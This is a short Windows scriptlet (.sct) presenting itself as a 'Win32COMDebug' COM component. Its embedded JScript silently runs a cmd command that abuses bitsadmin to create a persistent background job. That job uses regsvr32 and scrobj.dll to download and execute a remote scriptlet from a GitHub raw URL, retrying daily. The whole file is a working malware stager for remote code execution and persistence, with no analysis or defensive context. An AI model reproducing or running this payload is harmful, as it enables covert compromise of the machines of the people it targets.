<?XML version="1.0"?>
<scriptlet>
<registration
description="Win32COMDebug"
progid="Win32COMDebug"
version="1.00"
classid="{AAAA0111-0000-0000-0000-0000FEEDACDC}"
 >
 <script language="JScript">
      <![CDATA[
      	   var r = new ActiveXObject("WScript.Shell").Run("cmd /c bitsadmin /create updatagit & bitsadmin /addfile updatagit %comspec%  %temp%\\cmd.exe & bitsadmin /SetNotifyCmdLine updatagit regsvr32.exe \"/n /u /s /i:https://raw.githubusercontent.com/lucycool/1/master/4.sct scrobj.dll\" & bitsadmin /SetMinRetryDelay updatagit 86400 & bitsadmin /Resume updatagit",0);
	   
      ]]>
 </script>
</registration>
<public>
    <method name="Exec"></method>
</public>
</scriptlet>
